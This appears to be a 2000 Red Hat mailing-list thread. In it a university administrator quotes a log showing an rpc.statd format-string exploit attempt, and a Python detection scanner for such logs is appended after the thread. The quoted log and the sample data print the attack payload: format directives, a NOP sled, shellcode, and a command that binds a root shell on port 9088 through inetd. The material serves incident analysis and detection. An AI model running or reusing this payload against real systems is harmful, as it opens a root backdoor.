Uhhh, never mind, it IS on CERT as an rpc.statd and wu-ftpd exploit. Now to
see if they got in...
Gavin Durman --- Xavier University LAN System Administrator
=================================================
[EMAIL PROTECTED] ICQ: 20277424 http://durman.xu.edu
----------
>From: "Gavin" <[EMAIL PROTECTED]>
>To: [EMAIL PROTECTED]
>Subject: anyone seen this attack?
>Date: Mon, Nov 6, 2000, 12:56 PM
>
> Has anyone seen this type of attack before? I'm not sure just where to start
> looking other than CERT, but is it a dos, or an exploit of a particular
> OS/package? Thanks!
>
> Here you go...
>
> Active System Attack Alerts
> =-=-=-=-=-=-=-=-=-=-=-=-=-=
> Nov 3 23:45:03 www rpc.statd[366]: POSSIBLE SPOOF/ATTACK ATTEMPT!
>
> Security Violations
> =-=-=-=-=-=-=-=-=-=
> Nov 3 23:45:03 www rpc.statd[366]: POSSIBLE SPOOF/ATTACK ATTEMPT!
>
> Unusual System Events
> =-=-=-=-=-=-=-=-=-=-=
> Nov 3 18:01:00 www CROND[6057]: (root) CMD (run-parts /etc/cron.hourly)
> Nov 3 18:10:00 www CROND[6059]: (root) CMD ( /sbin/rmmod -as)
> Nov 3 18:20:00 www CROND[6061]: (root) CMD ( /sbin/rmmod -as)
> Nov 3 18:30:00 www CROND[6063]: (root) CMD ( /sbin/rmmod -as)
> Nov 3 18:40:00 www CROND[6065]: (root) CMD ( /sbin/rmmod -as)
> Nov 3 23:45:03 www rpc.statd[366]: SM_MON request for hostname containing
> '/': ^D���^D���^E���^E���^F���^F���^G���^G���%08x %08x %08x %08x %08x %08x
> %08x %08x %08x %08x %08x %08x %08x %08x
> %0242x%n%055x%n%012x%n%0192x%n\220\220\220\220\220\220\220\220\220\220\220\2
> 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
> 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
> 20�K^\211v�\203�
>
> \215^(\203� \211^�\203� \215^.\203� \203� \203�#\211^�1�\203� \210F'
> \210F*\203� \210F�\211F��+, \211�\215N�\215V��\2001�\211�@�\200����/bin/sh
> -c echo "9088 stream tcp nowait root /bin/sh -i" >> /tmp/m; /usr/sbin/inetd
> /tmp/m;
> Nov 3 23:45:03 www rpc.statd[366]: POSSIBLE SPOOF/ATTACK ATTEMPT!
> Nov 3 23:45:03 www rpc.statd[366]: STAT_FAIL to localhost for SM_MON of
> ^D���^D���^E���^E���^F���^F���^G���^G���%08x %08x %08x %08x %08x %08x %08x
> %08x %08x %08x %08x %08x %08x %08x
> %0242x%n%055x%n%012x%n%0192x%n\220\220\220\220\220\220\220\220\220\220\220\2
> 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
> 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
> 20�K^\211v�\203�
>
> \215^(\203� \211^�\203� \215^.\203� \203� \203�#\211^�1�\203� \210F'
> \210F*\203� \210F�\211F��+, \211�\215N�\215V��\2001�\211�@�\200����/bin/sh
> -c echo "9088 stream tcp nowait root /bin/sh -i" >> /tmp/m; /usr/sbin/inetd
> /tmp/m;
> Nov 3 18:50:00 www CROND[6067]: (root) CMD ( /sbin/rmmod -as)
> Nov 3 18:50:41 www rhnsd[6068]: running program /usr/sbin/rhn_check
> Nov 3 18:50:43 www rhnsd[766]: command returned:
> Nov 3 19:00:00 www CROND[6071]: (root) CMD (/bin/sh
> /usr/local/etc/logcheck.sh)
> Nov 3 19:00:00 www CROND[6072]: (root) CMD ( /sbin/rmmod -as)
>
>
> Gavin Durman --- Xavier University LAN System Administrator
> =================================================
> [EMAIL PROTECTED] ICQ: 20277424 http://durman.xu.edu
_______________________________________________
Redhat-list mailing list
[EMAIL PROTECTED]
https://listman.redhat.com/mailman/listinfo/redhat-list
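The log excerpt quoted above already answers the "DoS or exploit?" question if you read the rpc.statd message: the `%n` directives are memory writes, the run of `%08x` reads the stack, the octal `\220` bytes are a 0x90 NOP sled, and the tail is the command the shellcode is meant to run. As an added example (not from the thread, and not Red Hat's or logcheck's code), here is a small Python scanner that re-joins syslog records wrapped by the mailer, counts those indicators per record, gives a verdict, and pulls out the artifacts a responder would go and check for on the host. The sample lines are constructed and abbreviated from the quoted report (the raw shellcode bytes are dropped); the indicator names, thresholds and verdict strings are my own choices.

```python
import re

# Constructed sample input, abbreviated from the kind of logcheck report quoted
# in the thread: the shellcode bytes are dropped, only the textual indicators
# (format directives, octal-escaped 0x90 NOP sled, shell command) are kept.
SAMPLE_LOG = [
    "Nov 3 18:10:00 www CROND[6059]: (root) CMD ( /sbin/rmmod -as)",
    "Nov 3 23:45:03 www rpc.statd[366]: POSSIBLE SPOOF/ATTACK ATTEMPT!",
    "Nov 3 23:45:03 www rpc.statd[366]: SM_MON request for hostname containing",
    "'/': ^D^D^E^E%08x %08x %08x %08x %08x %08x %08x %08x",
    r"%0242x%n%055x%n%012x%n%0192x%n\220\220\220\220\220\220\220\220\220\220",
    '/bin/sh -c echo "9088 stream tcp nowait root /bin/sh -i" >> /tmp/m; /usr/sbin/inetd',
    "/tmp/m;",
    "Nov 3 23:45:03 www rpc.statd[366]: STAT_FAIL to localhost for SM_MON of",
    "^D^D%08x %08x %08x %08x %n...",
    "Nov 3 19:00:00 www CROND[6072]: (root) CMD ( /sbin/rmmod -as)",
]

# "Mon  D HH:MM:SS host prog[pid]: message" - the classic syslog line shape.
SYSLOG_HEAD = re.compile(
    r"^([A-Z][a-z]{2}\s+\d{1,2} \d{2}:\d{2}:\d{2}) (\S+) ([\w.-]+)\[(\d+)\]: (.*)$", re.S
)

# Each indicator is a regex over the message body; the number of matches is kept.
INDICATORS = {
    "statd_alert": re.compile(r"POSSIBLE SPOOF/ATTACK ATTEMPT"),
    "statd_bad_hostname": re.compile(r"SM_MON request for hostname containing '/'"),
    "format_string_write": re.compile(r"%\d*n"),        # %n writes a count into memory
    "stack_read": re.compile(r"(?:%0?8x\s*){4,}"),      # run of %08x stack reads
    "nop_sled": re.compile(r"(?:\\220|\x90){8,}"),      # 0x90 bytes as syslog's \220 escape
    "shell_command": re.compile(r"/bin/sh|/usr/sbin/inetd"),
}


def join_wrapped(lines):
    """Re-join syslog records that the mailer or the report wrapped across lines."""
    records = []
    for line in lines:
        line = line.rstrip("\n")
        if SYSLOG_HEAD.match(line) or not records:
            records.append(line)
        else:
            records[-1] += " " + line.strip()
    return records


def verdict(hits):
    """Turn the indicator counts into a one-line classification."""
    if "format_string_write" in hits and ("nop_sled" in hits or "shell_command" in hits):
        return "code-execution attempt: format-string %n write carrying a payload"
    if "format_string_write" in hits or "stack_read" in hits:
        return "format-string probe"
    if hits:
        return "suspicious"
    return "benign"


def classify(record):
    """Parse one syslog record and count the attack indicators in its message."""
    m = SYSLOG_HEAD.match(record)
    if not m:
        return None
    ts, host, prog, pid, msg = m.groups()
    hits = {name: len(rx.findall(msg)) for name, rx in INDICATORS.items() if rx.search(msg)}
    return {"ts": ts, "host": host, "prog": prog, "pid": int(pid), "msg": msg,
            "indicators": hits, "verdict": verdict(hits)}


def scan(lines):
    """Classify every record in a wrapped syslog/logcheck excerpt."""
    return [r for r in (classify(rec) for rec in join_wrapped(lines)) if r]


PATH_RE = re.compile(r"/tmp/[\w.\-]+")
PORT_RE = re.compile(r"(\d{2,5}) stream tcp nowait")


def extract_iocs(results):
    """Collect the files and ports named by payloads that carry a shell command,
    i.e. what a responder should look for on the host afterwards."""
    paths, ports = set(), set()
    for r in results:
        if r["prog"] == "rpc.statd" and "shell_command" in r["indicators"]:
            paths.update(PATH_RE.findall(r["msg"]))
            ports.update(int(p) for p in PORT_RE.findall(r["msg"]))
    return {"paths": sorted(paths), "ports": sorted(ports)}


if __name__ == "__main__":
    results = scan(SAMPLE_LOG)
    for r in results:
        print(f'{r["ts"]} {r["prog"]}[{r["pid"]}]: {r["verdict"]} {r["indicators"]}')
    print("artifacts to check on the host:", extract_iocs(results))
```

Run against the sample, the SM_MON record comes out as a code-execution attempt (four `%n` writes, a NOP sled and a shell command), the STAT_FAIL record as a plain format-string probe, and the cron noise as benign; the extracted artifacts are the `/tmp/m` inetd configuration and a root shell bound to port 9088, which is exactly what to look for when answering "did they get in": that file, a listener on that port, and an unexpected inetd process. One observation worth making about the quoted report itself: the `%08x` and `%n` tokens appear literally in the log, so at least the logging call that produced these lines did not expand them as a format string; that is not proof the daemon was unaffected elsewhere, but it is a useful data point alongside the host checks.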